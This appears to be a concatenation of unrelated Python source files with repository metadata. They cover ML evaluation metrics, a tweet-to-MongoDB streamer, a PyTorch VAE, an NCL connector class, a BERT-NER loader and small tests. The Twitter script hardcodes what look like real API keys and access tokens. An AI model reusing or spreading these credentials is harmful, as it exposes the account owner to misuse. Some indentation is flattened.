    print('Start drawing the roc curve \n')
    from sklearn.metrics import roc_curve
    from sklearn.metrics import auc
    # Flatten sigmoid outputs into a 1-D score vector.
    y_pred_keras = model.predict(x_test).ravel()
    fpr_keras, tpr_keras, thresholds_keras = roc_curve(y_test, y_pred_keras)
    auc_keras = auc(fpr_keras, tpr_keras)
    # Clear any previous axes before drawing.
    plt.cla()
    plt.figure(1)
    plt.plot([0, 1], [0, 1], 'k--')
    plt.plot(fpr_keras, tpr_keras, label='AUROC (area = {:.3f})'.format(auc_keras))
    plt.xlabel('False positive rate')
    plt.ylabel('True positive rate')
    plt.title('ROC curve')
    plt.legend(loc='best')
    # plt.show()
    print('AUROC (area = {:.3f})'.format(auc_keras))
    plt.savefig('/home/yuxuan/dp/m6aReader/ROC_m6areader.png')
    return auc_keras
def prcurve(model, x_test, y_test):
    """Draw the precision-recall curve and return the PR-AUC.

    NOTE(review): Sequential.predict_proba is deprecated/removed in recent
    tf.keras releases -- model.predict returns the same probabilities here;
    confirm the installed Keras version still supports it.
    """
    lr_probs = model.predict_proba(x_test)
    lr_precision, lr_recall, _ = precision_recall_curve(y_test, lr_probs)
    lr_auc = auc(lr_recall, lr_precision)
    # summarize scores
    print('PRAUC: auc=%.3f' % (lr_auc))
    # plot the precision-recall curves
    # Baseline: a no-skill classifier scores the positive-class prevalence.
    no_skill = len(y_test[y_test == 1]) / len(y_test)
    pyplot.cla()
    pyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')
    pyplot.plot(lr_recall, lr_precision, marker='.', label='Logistic')
    # axis labels
    pyplot.xlabel('Recall')
    pyplot.ylabel('Precision')
    # show the legend
    pyplot.legend()
    # show the plot
    # pyplot.show()
    plt.savefig('/home/yuxuan/dp/m6aReader/PRAUC_m6areader.png')
    return lr_auc
def MCC(model, x_test, y_test):
    """Compute, print and return the Matthews correlation coefficient."""
    from sklearn.metrics import matthews_corrcoef
    predictions = model.predict_classes(x_test)
    score = matthews_corrcoef(y_test, predictions)
    print('MCC = {:.3f}'.format(score))
    return score
def ACC(model, x_test, y_test):
    """Compute, print and return the plain accuracy on the test set."""
    from sklearn.metrics import accuracy_score
    predictions = model.predict_classes(x_test)
    score = accuracy_score(y_test, predictions)
    print('ACC = {:.3f}'.format(score))
    return score
def main():
    """End-to-end run: load data, train, plot losses, and save metrics.

    Writes the four scores (AUROC, PR-AUC, MCC, ACC) as a one-column CSV
    to a hard-coded path under /home/yuxuan/dp/m6aReader/.
    """
    x_train, x_test, y_test, y_train = load_data()
    model = build_model(x_train)
    history = compileModel(model, x_train, x_test, y_test, y_train)
    lossplot(history)
    auc = roc(model, x_test, y_test)
    prauc =prcurve(model, x_test, y_test)
    mcc =MCC(model,x_test,y_test)
    acc = ACC(model,x_test,y_test)
    results = np.array([auc,prauc,mcc,acc])
    np.savetxt('/home/yuxuan/dp/m6aReader/eif3a_full_m6aReader.csv', results, delimiter=',')
if __name__ == '__main__':
main()
| [
"yuxuan.wu17@gmail.com"
] | yuxuan.wu17@gmail.com |
c2fd4c3fec6f8deacabcdb8e6a1f219e8f2805bd | a20f21f0737002e3fb3e8345c42f2f46aaefab7d | /Weather Report/TwitterToMongo.py | 558b800e0079be39bccb42359abeb41838cac9c4 | [] | no_license | akokaz1/PMG | 22a5c2dad1d38de013f73b314365e01890aeddff | a9db139d728765ef6c03140eba2f2c6861b37e91 | refs/heads/master | 2021-01-20T07:57:00.178171 | 2016-12-02T14:46:46 | 2016-12-02T14:46:46 | 68,720,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | from twython import TwythonStreamer
from pymongo import MongoClient
client = MongoClient()
db = client.twitter
tweets = db.twitterdata
tweeter = []
class MyStreamer(TwythonStreamer):
    """Twython (Python 2) streamer that stores English tweets in MongoDB.

    Appends each English tweet to the module-level `tweeter` list and
    inserts it into the `tweets` Mongo collection, disconnecting after
    3000 tweets have been collected.
    """
    def on_success(self, data):
        # NOTE(review): assumes every payload carries a 'lang' key; delete/
        # limit notices from the streaming API do not -- confirm this cannot
        # raise KeyError mid-stream.
        if data ['lang'] == 'en':
            tweeter.append(data)
            tweets.insert(data)
            print 'recieved tweet #', len(tweeter)
            # Stop once the target sample size is reached.
            if len(tweeter)>= 3000:
                self.disconnect()
    def on_error(self,status_code, data):
        # Any stream error aborts the collection run.
        print status_code, data
        self.disconnect()
stream = MyStreamer('eAL497dT5hjs2bHLh1mRoR3cj', 'HUuqoidPWbT04QPpZfFHwpqvLvq6IxOU1kOa2eRRZf8Rh5XmtE',
'775365291555651584-hhpeCLC8VY2ccOoeWxXge6cWbamKhBG',
'zzlkNqY4eaxCZ738GXhcTPmQf2L9RkO6uZot93a2ZJoF7')
stream.statuses.filter(track='london avalanche\
,london balmy\
,london black ice\
,london blizzard\
,london blustery\
,london breeze\
,london cloud\
,london cloudy\
,london cold\
,london condensation\
,london dew\
,london downburst\
,london downpour\
,london drizzle\
,london drought\
,london dry\
,london flood\
,london fog\
,london forecast\
,london freeze\
,london freezing\
,london frost\
,london gale\
,london gust\
,london gustnado\
,london hail\
,london haze\
,london heat\
,london heatwave\
,london humid\
,london humidity\
,london hurricane\
,london ice\
,london icicle\
,london lightning\
,london mist\
,london muggy\
,london overcast\
,london permafrost\
,london rain\
,london rainbands\
,london rainbow\
,london sandstorm\
,london sleet\
,london slush\
,london smog\
,london snow\
,london snowstorm\
,london storm\
,london summer\
,london sunrise\
,london sunset\
,london temperature\
,london thaw\
,london thunder\
,london thunderstorm\
,london tropical\
,london visibility\
,london warm\
,london weather\
,london wind\
,london winter')
#tweets.insert_many(tweeter)
| [
"alikokaz@live.co.uk"
] | alikokaz@live.co.uk |
002d43df6b57bde48d6fb3e45f4ec7e76b5e5901 | bf0b6a4973f2c565e71fb3c0171ee2039464fa55 | /duckietown_rl/vae.py | abd23b158ece8ca81ee87d15f51cc7233499e464 | [] | no_license | duckieT/duckietown_rl_ddpg_vae | d891d5dc15bc05fbe2c0e5f4281beb363c660de1 | 739210584fb9a4028887a3e2d420a1b3686952b1 | refs/heads/master | 2020-04-18T06:42:09.426461 | 2018-11-14T06:03:19 | 2018-11-14T06:03:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,592 | py | from __future__ import print_function
import torch
from torch import nn, optim
from torch .nn import functional as F
from torchvision .utils import save_image
import numpy as np
# hyperparameters
input_image_size = (480, 640)
input_image_channels = 3
image_dimensions = input_image_channels * input_image_size [0] * input_image_size [1]
feature_dimensions = 1000
encoding_dimensions = 40
learning_rate = 1e-3
# test hyperparameters
test_reconstruction_n = 8
test_sample_n = 8
def thing ():
    """Return an empty dict that also supports attribute-style access.

    ``t.x = 1`` stores ``t["x"] = 1`` and ``t.x`` reads it back. Used as a
    lightweight namespace for the trainer/model argument bags below.
    """
    class _AttrDict (dict):
        def __getattr__(self, attr):
            # Translate KeyError to AttributeError so hasattr()/getattr()
            # with a default behave correctly for missing names (the old
            # code leaked KeyError out of attribute lookup).
            try:
                return self [attr]
            except KeyError:
                raise AttributeError (attr) from None
        def __setattr__(self, attr, val):
            self [attr] = val
    return _AttrDict ()
def params ():
    """Parse command-line arguments into (trainer_args, model_args) bags.

    trainer_args holds run configuration (paths, batch size, epochs, cuda,
    logging); model_args holds the VAE hyperparameters. Also creates the
    output directory.

    NOTE(review): os.makedirs is called with trainer_args.out even though
    --out defaults to None, which would raise TypeError -- confirm --out is
    effectively required.
    """
    import argparse
    import os
    import sys
    parser = argparse .ArgumentParser (description = 'vae x ducks')
    parser .add_argument ('--train', type = str, required = True, metavar = 'path', help = 'path to a folder containing training images for the vae')
    parser .add_argument ('--test', type = str, default = None, metavar = 'path', help = 'path to a folder containing test images for the vae (default: training dataset)')
    parser .add_argument ('--init', type = str, default = None, metavar = 'path', help = 'path to a trained model file for initializing training')
    parser .add_argument ('--learning-rate', type = float, default = learning_rate, metavar = 'n', help = 'learning rate for adam (default: ' + str (learning_rate) + ')')
    parser .add_argument ('--feature-dim', type = int, default = feature_dimensions, metavar = 'd', help = 'number of feature dimonsions (default: ' + str (feature_dimensions) + ')')
    parser .add_argument ('--encoding-dim', type = int, default = encoding_dimensions, metavar = 'd', help = 'number of encoding dimensions (default: ' + str (encoding_dimensions) + ')')
    parser .add_argument ('--batch-size', type = int, default = 10, metavar = 'n', help = 'batch size for training (default: 10)')
    parser .add_argument ('--epochs', type = int, default = 10, metavar = 'n', help = 'number of epochs to train (default: 10)')
    parser .add_argument ('--activation', type = str, default = 'relu', choices = ['relu', 'leaky_relu', 'selu'], metavar = 'a', help = 'activation function in the hidden layers (default: relu)')
    parser .add_argument ('--log-interval', type = int, default = 10, metavar = 's', help = 'how many batches to wait before logging training status (default: 10)')
    parser .add_argument ('--seed', type = int, default = 1, metavar = 's', help = 'random seed (default: 1)')
    parser .add_argument ('--no-cuda', action = 'store_true', default = False, help = 'disables CUDA training')
    parser .add_argument ('--out', type = str, default = None, metavar = 'path', help = 'path to a folder to store output')
    parser .add_argument ('--out-model', action = 'store_true', default = False, help = 'output model_n.pt')
    args = parser .parse_args ()
    trainer_args = thing ()
    trainer_args .train = args .train
    # The test set defaults to the training set when --test is omitted.
    trainer_args .test = args .test or args .train
    trainer_args .learning_rate = args .learning_rate
    trainer_args .batch_size = args .batch_size
    trainer_args .epochs = args .epochs
    trainer_args .log_interval = args .log_interval
    trainer_args .seed = args .seed
    trainer_args .cuda = not args .no_cuda and torch .cuda .is_available ()
    trainer_args .init = args .init
    trainer_args .out = args .out
    trainer_args .out_model = args .out_model
    model_args = thing ()
    model_args .feature_dimensions = args .feature_dim
    model_args .encoding_dimensions = args .encoding_dim
    model_args .activation = args .activation
    os .makedirs (trainer_args .out, exist_ok = True)
    # Warn (but continue) when the output folder already has content.
    if os .listdir (trainer_args .out):
        print ('Warning: ' + trainer_args .out + ' is not empty!', file = sys .stderr)
    return trainer_args, model_args
def load_samples (path, cuda = True):
    """Build a shuffled DataLoader over the images under *path*.

    torchvision's ImageFolder expects class subfolders, so the target folder
    is exposed as a single pseudo-class by symlinking it as 'data' inside a
    fresh temporary directory.

    :param path: folder containing the sample images
    :param cuda: enable pinned memory / a transfer worker for GPU training.
        (Previously this parameter was silently ignored in favour of the
        global trainer_args.cuda; both call sites pass that same value, so
        honouring the parameter is behaviour-preserving.)
    """
    import os
    import tempfile
    from torch .utils .data import DataLoader
    from torchvision import datasets, transforms
    image_folder_path = tempfile .TemporaryDirectory () .name
    os .makedirs (image_folder_path)
    # NOTE(review): os.symlink needs privileges on Windows -- confirm this
    # only runs on POSIX hosts.
    os .symlink (os .path .realpath (path), os .path .join (image_folder_path, 'data'))
    # Use the explicit `cuda` argument rather than the module-level flag.
    cuda_args = {'num_workers': 1, 'pin_memory': True} if cuda else {}
    return DataLoader (
        dataset = datasets .ImageFolder (image_folder_path, transform = transforms .ToTensor ()),
        batch_size = trainer_args .batch_size,
        shuffle = True,
        **cuda_args)
def out_file (filename):
    """Return *filename* joined under the --out directory."""
    import os
    return os .path .join (trainer_args .out, filename)
def load_state ():
    """Load the checkpoint named by --init, or an empty dict when absent."""
    return torch .load (trainer_args .init) if trainer_args .init else {}
def save_state ():
    """Persist epoch counter, RNG state, model and optimizer to state_<epoch>.pt.

    When --out-model is set, also writes a weights-only model_<epoch>.pt.
    Relies on the module-level `epoch`, `model` and `optimizer` bound in
    the training script below.
    """
    torch .save ((
        { 'epoch': epoch
        , 'rng': torch .get_rng_state ()
        , 'model': model .state_dict ()
        , 'optimizer': optimizer .state_dict () })
        , out_file ('state_' + str (epoch) + '.pt'))
    if trainer_args .out_model:
        torch .save ({ 'model': model .state_dict () }
            , out_file ('model_' + str (epoch) + '.pt'))
class VAE (nn .Module):
    """Fully-connected variational autoencoder over flattened images.

    Architecture: image -> fc1 -> activation -> (fc21: mu, fc22: logvar)
    -> reparameterize -> fc3 -> activation -> fc4 -> sigmoid -> image.

    The submodule names fc1..fc4 are part of the checkpoint format saved by
    save_state() and must not be renamed, or existing state_dicts stop
    loading. The encoder accepts either a torch tensor or a numpy ndarray;
    ndarrays are flattened, cast to float32 and moved to self.device.
    """
    def __init__ (self, image_dimensions, feature_dimensions, encoding_dimensions, activation, **kwargs):
        super (VAE, self) .__init__ ()
        self .activation = activation
        self.img_dim = image_dimensions
        self.feat_dim = feature_dimensions
        self.encode_dim = encoding_dimensions
        self .fc1 = nn .Linear (image_dimensions, feature_dimensions)
        self .fc21 = nn .Linear (feature_dimensions, encoding_dimensions)
        self .fc22 = nn .Linear (feature_dimensions, encoding_dimensions)
        self .fc3 = nn .Linear (encoding_dimensions, feature_dimensions)
        self .fc4 = nn .Linear (feature_dimensions, image_dimensions)
        self.device = torch .device ('cuda' if torch.cuda.is_available() else 'cpu')

    def _activate (self, t):
        """Apply the configured hidden activation (shared by encode/decode).

        Raises the same Exception as before for an unknown activation name.
        """
        if self .activation == 'relu':
            return F .relu (t)
        if self .activation == 'leaky_relu':
            return F .leaky_relu (t)
        if self .activation == 'selu':
            return F .selu (t)
        raise Exception ('unknown activation', self .activation)

    def _flatten (self, x):
        """Coerce ndarray/tensor input to a (batch, img_dim) float tensor."""
        if isinstance (x, np .ndarray):
            x = x .reshape (-1, self.img_dim)
            return torch .from_numpy (x) .type (torch .FloatTensor) .to (self.device)
        return x .view (-1, self.img_dim)

    def encode (self, x):
        """Map input to the posterior parameters (mu, logvar)."""
        h1 = self ._activate (self .fc1 (self ._flatten (x)))
        return self .fc21 (h1), self .fc22 (h1)

    def reparameterize (self, mu, logvar):
        """Sample z = mu + sigma * eps with eps ~ N(0, I)."""
        std = torch .exp (0.5 * logvar)
        eps = torch .randn_like (std)
        return eps .mul (std) .add_ (mu)

    def decode (self, z):
        """Map a latent code back to a sigmoid image in [0, 1]."""
        h3 = self ._activate (self .fc3 (z))
        return torch .sigmoid (self .fc4 (h3))

    def forward (self, x):
        """Return (reconstruction, mu, logvar) for a batch."""
        mu, logvar = self .encode (x)
        z = self .reparameterize (mu, logvar)
        return self .decode (z), mu, logvar
# Reconstruction + KL divergence losses summed over all elements and batch
def objective (recon_x, x, mu, logvar):
    """Negative ELBO: summed binary cross-entropy plus analytic KL term.

    :param recon_x: decoder output, (batch, image_dimensions) in [0, 1]
    :param x: original batch (any shape; flattened via the module-level
        image_dimensions to match recon_x)
    :param mu: posterior means, (batch, encoding_dimensions)
    :param logvar: posterior log-variances, same shape as mu
    """
    BCE = F .binary_cross_entropy (recon_x, x .view (-1, image_dimensions), reduction = 'sum')
    # see Appendix B from VAE paper:
    # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
    # https://arxiv.org/abs/1312.6114
    # 0.5 * sum (1 + log (sigma^2) - mu^2 - sigma^2)
    KLD = -0.5 * torch .sum (1 + logvar - mu .pow (2) - logvar .exp ())
    return BCE + KLD
def train (epoch):
    """Run one training epoch over train_sampler, logging every log_interval batches.

    Uses the module-level `model`, `optimizer`, `device`, `train_sampler`
    and `trainer_args` bound in the script section below.
    """
    model .train ()
    total_train_loss = 0
    for i, (batch_sample, _) in enumerate (train_sampler):
        batch_sample = batch_sample .to (device)
        optimizer .zero_grad ()
        recon_batch, mu, logvar = model (batch_sample)
        loss = objective (recon_batch, batch_sample, mu, logvar)
        loss .backward ()
        total_train_loss += loss .item ()
        optimizer .step ()
        if i % trainer_args .log_interval == 0:
            print ('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}' .format
                ( epoch
                , i * len (batch_sample)
                , len (train_sampler .dataset)
                , 100. * i / len (train_sampler)
                , loss .item () / len (batch_sample)))
    # objective() sums over elements, so dividing the running total by the
    # dataset size yields a per-sample average loss.
    train_loss = total_train_loss / len (train_sampler .dataset)
    print ('====> Epoch: {} Average loss: {:.4f}' .format (epoch, train_loss))
def test (epoch):
    """Evaluate on test_sampler; optionally dump comparison/sample images.

    When --out is set, the first batch produces a side-by-side grid of
    originals vs reconstructions, and after the loop a grid of decoder
    samples drawn from the N(0, I) prior is written as sample_<epoch>.png.
    """
    model .eval ()
    total_test_loss = 0
    with torch .no_grad ():
        for i, (batch_sample, _) in enumerate (test_sampler):
            batch_sample = batch_sample .to (device)
            recon_batch, mu, logvar = model (batch_sample)
            total_test_loss += objective (recon_batch, batch_sample, mu, logvar) .item ()
            if trainer_args .out and i == 0:
                # Top row(s): inputs; bottom row(s): reconstructions.
                test_batch_size = min (batch_sample .size (0), trainer_args .batch_size)
                n = min (test_batch_size, test_reconstruction_n)
                comparison = torch .cat (
                    [ batch_sample [:n]
                    , recon_batch .view (test_batch_size, input_image_channels, input_image_size [0], input_image_size [1]) [:n] ])
                save_image (comparison .cpu (), out_file ('reconstruction_' + str (epoch) + '.png'), nrow = n)
    test_loss = total_test_loss / len (test_sampler .dataset)
    print ('====> Test set loss: {:.4f}' .format (test_loss))
    if trainer_args .out:
        # Unconditional samples: decode latent codes drawn from the prior.
        encoding_sample = torch .randn (test_sample_n ** 2, model_args .encoding_dimensions) .to (device)
        image_sample = model .decode (encoding_sample) .cpu ()
        save_image (image_sample .view (test_sample_n ** 2, input_image_channels, input_image_size [0], input_image_size [1])
            , out_file ('sample_' + str (epoch) + '.png'))
"""
trainer_args, model_args = params ()
torch .manual_seed (trainer_args .seed)
train_sampler = load_samples (trainer_args .train, trainer_args .cuda)
test_sampler = load_samples (trainer_args .test, trainer_args .cuda)
device = torch .device ('cuda' if trainer_args .cuda else 'cpu')
model = VAE (**model_args) .to (device)
optimizer = optim .Adam (model .parameters (), lr = trainer_args .learning_rate)
epoch_offset = 1
state = load_state ()
if 'rng' in state:
torch .set_rng_state (state ['rng'])
if 'model' in state:
model .load_state_dict (state ['model'])
if 'optimizer' in state:
optimizer .load_state_dict (state ['optimizer'])
if 'epoch' in state:
epoch_offset += state ['epoch']
for epoch in range (epoch_offset, epoch_offset + trainer_args .epochs):
train (epoch)
test (epoch)
if trainer_args .out:
save_state ()
"""
| [
"richielyl@hotmail.com"
] | richielyl@hotmail.com |
f1cea55677410e3239fb9b79ba0d8b8c3a11d14c | 190bd588ba4a5c69db4cb10382553e4ba013b301 | /ncl/causalconnector.py | 46e160ccde0311e545657ef0f59693833e4f8954 | [
"MIT"
] | permissive | MichaelBittencourt/NCL-Generator-API | 56bf7a480c4466b9e764bfe887ee196054c281eb | 8eecf2ea4948354fae9f64b68da2f24ad0663d60 | refs/heads/master | 2020-12-04T16:56:42.201088 | 2020-01-25T03:45:00 | 2020-01-25T02:06:06 | 231,844,836 | 1 | 1 | MIT | 2020-01-25T02:06:08 | 2020-01-04T23:54:08 | Python | UTF-8 | Python | false | false | 1,287 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Michael Bittencourt <mchl.bittencourt@gmail.com>
#
# Distributed under terms of the MIT license.
"""
"""
from ncl.abstractelement import AbstractElement
from ncl.condition import Condition
from ncl.action import Action
from ncl.connectorparam import ConnectorParam
class CausalConnector(AbstractElement):
    """NCL <causalConnector>: exactly one Condition plus one Action.

    ConnectorParam children may be added freely; attempting to add a second
    Condition or Action raises.
    """

    def __init__(self, id, condition, action):
        super().__init__("causalConnector", ["id"], [Condition, Action, ConnectorParam])
        self.set("id", id)
        self.add(condition)
        self.add(action)

    def add(self, nclComponent):
        # Enforce the at-most-one rule for Condition and Action children.
        for child_type, label in ((Condition, "Condition"), (Action, "Action")):
            if isinstance(nclComponent, child_type) and len(self._getListChildren()[child_type]) > 0:
                raise Exception("Is not possible add more of one " + label + " in CausalConnector")
        return super().add(nclComponent)
#TODO Still need setup logic to caudalConnector and need update tu user Condition when this class will created
pass
| [
"mchl.bittencourt@gmail.com"
] | mchl.bittencourt@gmail.com |
d705d8ae5e78e993dd20c7d1b1c4e43f687428c5 | 490ed3946708791a188c6f375b1986ba1fb7d386 | /build/lib/keras_bert_ner/utils/.ipynb_checkpoints/predict-checkpoint.py | 3efcaa50da311647a86771cd08b39325e51e3874 | [
"MIT"
] | permissive | gm19900510/keras-bert-ner | 123c40487b5a20d6be49b1d808a832ccd3d2a489 | 6b37b23623544e7e1ec59a0b12ac92bff2b69182 | refs/heads/master | 2020-09-01T12:11:13.456500 | 2019-10-31T09:50:24 | 2019-10-31T09:50:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import codecs
import pickle
import numpy as np
from keras.models import load_model
from ..bert4keras.layers import custom_objects
from ..bert4keras.utils import Tokenizer
from ..decode.viterbi import Viterbi
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
__all__ = ["build_trained_model", "get_model_inputs"]
custom_objects["CRF"] = CRF
custom_objects["crf_loss"] = crf_loss
custom_objects["crf_viterbi_accuracy"] = crf_viterbi_accuracy
def build_trained_model(args):
    """Load vocab, trained NER model and tag map; return (tokenizer, id2tag, viterbi_decoder).

    CUDA visibility is configured from args.device_map before any model is
    loaded ("cpu" hides all GPU devices).
    """
    if args.device_map != "cpu":
        os.environ["CUDA_VISIBLE_DEVICES"] = args.device_map
    else:
        os.environ["CUDA_VISIBLE_DEVICES"] = ""
    # BERT vocabulary: one token per line; the line order defines the ids.
    token_dict = {}
    with codecs.open(args.bert_vocab, "r", encoding="utf-8") as f:
        for line in f:
            token = line.strip()
            token_dict[token] = len(token_dict)
    tokenizer = Tokenizer(token_dict)
    model = load_model(os.path.join(args.model_path, args.model_name), custom_objects=custom_objects)
    # SECURITY: pickle.load executes arbitrary code on load -- only read
    # id2tag.pkl from trusted model directories.
    with codecs.open(os.path.join(args.model_path, "id2tag.pkl"), "rb") as f:
        id2tag = pickle.load(f)
    viterbi_decoder = Viterbi(model, len(id2tag))
    return tokenizer, id2tag, viterbi_decoder
def get_model_inputs(tokenizer, src_data, max_len):
    """Encode raw texts into per-sample token-id and segment-id arrays.

    :param tokenizer: tokenizer exposing encode(text, first_length=...)
    :param src_data: iterable of input strings
    :param max_len: fixed sequence length each sample is padded/truncated to
    :return: (token_arrays, segment_arrays) -- two parallel lists of np.ndarray
    """
    token_ids = []
    segment_ids = []
    for text in src_data:
        ids, segs = tokenizer.encode(text, first_length=max_len)
        token_ids.append(np.array(ids))
        segment_ids.append(np.array(segs))
    return token_ids, segment_ids
"liushaoweihua@yiwise.com"
] | liushaoweihua@yiwise.com |
8944bf53f63bed3d9af9f46ea6448ceb52c8803e | 2c359d4e3a387040116cb983950605b4ee22d1f7 | /program/minh.py | ec4db9a48f4e8900b0c94f5acc171b07b34e69e2 | [] | no_license | VenkatProjects/Python | cd25adcadfcb2a3d3cd0263a68e7d9489c630741 | 652fd8f48c4ab5b494694c16e037daf4aa05d99b | refs/heads/master | 2023-02-03T22:40:25.915725 | 2023-01-27T06:37:50 | 2023-01-27T06:37:50 | 281,453,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 656 | py | class Person:
def __init__(self, name):
self.name = name
def sayName(self):
print("My name is : {}".format(self.name))
class Engineer(Person):
def __init__(self, name):
super().__init__(name)
self.profession = "Engineer"
def sayProfession(self):
print(self.profession)
class Doctor(Person):
def __init__(self, name):
super().__init__(name)
self.profession = "Doctor"
def sayProfession(self):
print(self.profession)
engineer = Engineer("venkat")
doctor = Doctor("poonga")
engineer.sayName()
engineer.sayProfession()
doctor.sayName()
doctor.sayProfession() | [
"esan1610@gmail.com"
] | esan1610@gmail.com |
8ea574857fbefb741c89a4bd87a9dd7d8dca56e0 | 0ff6198179fda1763acba69ff414c32e0f537233 | /papers/admin.py | a402aa0c0c52c85351602ea2b3aef87fbfe288fe | [
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | jc11am/Lab-Website | 2a4d03f98f0502a2f77dacbbcd6db6714823cdab | 111e837c957e5c73022de366985aaa6e3b3d014c | refs/heads/master | 2021-05-16T22:54:04.790528 | 2016-09-10T19:28:37 | 2016-09-10T19:28:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | '''This package sets up the admin interface for the :mod:`papers` app.'''
from django.contrib import admin
from papers.models import Publication, AuthorDetails, AuthorContributions
class PublicationAdmin(admin.ModelAdmin):
    '''The :class:`~papers.models.Publication` model admin is the default.'''
    pass
admin.site.register(Publication, PublicationAdmin)
class AuthorDetailsAdmin(admin.ModelAdmin):
    '''The :class:`~papers.models.AuthorDetails` model admin is the default.'''
    pass
admin.site.register(AuthorDetails, AuthorDetailsAdmin)
class AuthorContributionsAdmin(admin.ModelAdmin):
    '''The :class:`~papers.models.AuthorContributions` model admin is the default.'''
    pass
admin.site.register(AuthorContributions, AuthorContributionsAdmin)
"dave.bridges@gmail.com"
] | dave.bridges@gmail.com |
46e7c0ebfd167b48434b11d94b7ebaa0bb8cb136 | 2cad173dd3d6a378d805592eb71ce7261d5c3f98 | /Get Files From Directory Dynamically.py | 2c2c91a352b777dfe8c93333dd85c599f1ac5526 | [] | no_license | souravbanerjeewb/Code | b4ae2fd2d1157d98c5d01ad2c2e3fe5758f0a17e | bd1bcdc06a4b1a03c067cf34aeb6ae5000dc8732 | refs/heads/master | 2023-01-04T08:10:24.710146 | 2020-10-27T17:25:15 | 2020-10-27T17:25:15 | 112,154,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | import glob, os
#*****Define the directory******
os.chdir("D:/Files")#***Change the directory as requered
#*****Loop to get the txt files and display the name
for file in glob.glob("*.txt"):
print(file)
| [
"noreply@github.com"
] | noreply@github.com |
8c650db903e4c481af2d57614db70fd99846e0d2 | 6ebb264379c41c8e22bf89bb482d56de1a2f2e50 | /tests/unit/test_sum.py | fe4cc3aa315276e8d4f493317f4ece75063ae710 | [] | no_license | axen22/unitTest3 | 864cce48660312398db3546382375f720e74b7ac | 38b9e7b37941def9c8a90665107b87a6579925a2 | refs/heads/master | 2020-07-28T07:04:10.491348 | 2019-09-18T15:43:33 | 2019-09-18T15:43:33 | 209,346,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #another way to do this
#target = __import__("my_sum.py")
#sum = target.sum
import unittest
from fractions import Fraction
from my_sum import sum
class TestSum(unittest.TestCase):
    """Unit tests for my_sum.sum (imported above, shadowing the builtin)."""
    def test_list_int(self):
        """
        Test that it can sum a list of integers
        """
        data = [1, 2, 3]
        result = sum(data)
        self.assertEqual(result, 6)
    def test_list_fraction(self):
        """
        Test that it can sum a list of fractions
        """
        data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 4)]
        result = sum(data)
        self.assertEqual(result, 1)
    def test_bad_type(self):
        """Test that summing a non-numeric sequence raises TypeError."""
        data = "banana"
        with self.assertRaises(TypeError):
            result = sum(data)
if __name__ == '__main__':
    # Allow running this test module directly: python test_sum.py
    unittest.main()
"53572480+axen22@users.noreply.github.com"
] | 53572480+axen22@users.noreply.github.com |
75553f4f93558a9c446c561ab0cac78bb68102c8 | b232ab24686a197a88973f26478157d05c71a930 | /03. 파이썬 문자열/049.py | a0ff28c7508d71fb92da6f742be5fdf32d09267d | [] | no_license | areum0505/python300 | 09a3ea858bb728b6e2f699a57f013457680ab1d8 | e3b56bd653390172410b86e15c40f34ef3125787 | refs/heads/master | 2023-01-06T04:53:44.937116 | 2020-10-22T23:44:36 | 2020-10-22T23:44:36 | 288,321,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | # 다음과 같이 날짜를 표현하는 문자열이 있을 때 연도, 월, 일로 나눠보세요.
# Split the ISO-style date string into its year, month, and day parts.
# (The original called date.split("-") and discarded the result.)
date = "2020-05-01"
year, month, day = date.split("-")
| [
"noreply@github.com"
] | noreply@github.com |
837f178ec38d14871743e1d84aa11312970b3087 | ae9f2d64c8d0fc711d426e80e41bbce158ab7a4e | /build/config.gypi | 8529efc74c687d82ee2470bca8a5e886d916f502 | [] | no_license | aitchkhan/Real-Time-Chat-with-Node-js | 2863c3b9a173d1807acd5696decb74f66ddd79a7 | 201b7c6126c28f09415699521b6401349bf5cee3 | refs/heads/master | 2021-01-23T16:40:01.118218 | 2015-11-08T12:46:42 | 2015-11-08T12:46:42 | 34,112,637 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_has_winsdk": "true",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "ia32",
"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\aitchkhan\\.node-gyp\\0.12.2",
"copy_dev_lib": "true",
"standalone_static_library": 1
}
}
| [
"aitchkhan@gmail.com"
] | aitchkhan@gmail.com |
